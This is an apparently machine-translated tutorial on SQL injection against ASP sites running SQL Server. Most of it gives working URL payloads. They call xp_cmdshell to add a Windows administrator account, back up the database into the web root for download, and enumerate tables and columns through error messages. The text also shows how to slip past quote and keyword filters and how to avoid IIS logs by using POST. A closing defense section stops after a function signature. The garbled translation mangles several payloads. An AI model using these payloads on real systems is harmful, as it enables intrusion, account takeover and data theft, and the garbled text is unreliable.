After reading the entry and advanced articles, it is no problem to crack the general website. But if you can't touch the name of the table name, or how the author is filtered with some special characters, how to improve the success rate of injection? How to improve the guess efficiency? Let everyone look down in the high-end.
In the first section, use the system table to inject the SQLServer database
SQLServer is a powerful database system that has a close contact with the operating system, which brings great convenience to developers, but on the other hand, it also provides a springboard for the injection, let's take a look at several Specific example:
1HTTP: //site/url.asp? Id = 1; exec master "NAME PASSWORD / ADD" -
Sequel; in SQL Server, the two sentences are separated, - indicates that the following statement is a comment, so this statement will be divided into two sentences in SQL Server, first, SELECT Id = 1 record, then execute storage Process XP_cmdshell, this stored procedure is used to call the system command, so use the NET command to create a new user name name Name, password is the Windows account number, then:
2http: //site/url.asp? Id = 1; exec master "Net localgroup name administrators / add" -
Join the new account Name to the administrator group, don't have to be used, you have already got the system's highest permission! Of course, this method is only applicable to the case where the database is connected to the SA, otherwise, there is no permission to call XP_cmdshell.
3HTTP: //site/url.asp? Id = 1 ;; and db_name ()> 0
There is a similar example and user> 0, and the role is to obtain the connection user name, DB_NAME () is another system variable, returning is the connected database name.
4http: //site/url.asp? Id = 1; Backup Database Database name to disk = 'c: /inetpub/wwroot/1.db'; -
This is a quite a trick, from 3 database name, plus some IIS error exposed absolute path, back up the database back to the web directory, and use HTTP to complete the entire database, complete the entire download, All administrators and user passwords are unfair! When you don't know the absolute path, you can also back up the method of the network address (such as //202.96.xx.xx/share/1.db), but the success rate is not high.
5http: //site/url.asp? Id = 1 ;; and (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0
As mentioned earlier, sysObjects is the system table of SQL Server, stores all the table names, views, constraints, and other objects, Xtype = 'u' and status> 0, indicating the table name created by the user, the above statement will be the first table. The name is taken out, and the 0 is relatively small, so that the error message is exposed to the table name. Second, how to get the third table name? Or leave our smart readers think.
6http: //site/url.asp? Id = 1 ;; and (select top 1 col_name (Object_ID ('Name'), 1) from sysobjects> 0
After getting the table name from 5, use Object_ID ('Name') to get the internal ID, col_name (Name ID, 1) of the table name, represent the first field name of the table, change 1 to 2, 3, 4 ... You can get the field name inside the guess table one by one. The above 6 points is that I have studied SQL Server injection of hardcore crystals, it can be seen that the degree of understanding of SQL Server directly affects success rate and guessing speed. After I study SQLServer injection, I also got a lot of improvement in development, huh, maybe safety and development was completed.
In the second section, bypass the program limit continues to inject
In the entry, there are many people like to use the 'number test into the vulnerability, so there are many people who use the filter' to "prevent" to inject vulnerabilities, which may block some entry of the entry, but familiar with SQL injection People can still use the related functions to achieve the purpose of bypassing the program.
In the "SQL Injection" section, the statements I have use have been optimized, so that they do not include single quotes; in the "Using the System Table Inject into the SQLServer Database", some statements contain a 'number, We will give an example to see how to transform these statements:
Simple, like WHERE XTYPE = 'u', the ASCII code corresponding to the character u is 85, so you can use where xtype = char (85) instead; if the character is Chinese, such as where name = 'user', you can use where name = Nchar (29992) NCHAR (25143) instead.
Section III, experience summary
1. Some people will filter these keywords such as select, update, delete, but forget to distinguish case sensation, so everyone can try it with SELECT.
2. When you can't guess the field name, you may wish to look at the login form on the website. Generally, the field name is the same name with the form of the form.
3. Special Note: The number incorporated in the address bar is interpreted as space, the% 2B is interpreted as number, and the% 25 is explained to the% number, and the specific introduction can be referred to URLENCode.
4. When injecting with GET method, IIS will record all your submission strings, do not record the POST method, so you can use the POST's URL to try not to use GET.
5. Instest the use of ASCII checking method, SQL Server can also use this method, only the difference between the two can only be exposed, but if the value of the error information can be exposed, that efficiency and Accuracy will have great improvements.
Defense method
SQL injection vulnerabilities can be described as "a thousand miles of embankments, collapsed in the ant hole", which is extremely common online, usually because the programmer does not understand, or the program is not strict, or a parameter is forgotten. Here, I will give you a function, instead of the Request function in the ASP, can inject SAY NO to all SQL, the function is as follows:
Function Saferequest (PARANAME, PARATYPE) --- Parameters --- paraName: Parameter Name - Character-Type Paratype: Parameter Type - Digital (1 means the above parameters are numbers, 0 means the above parameters are characters)
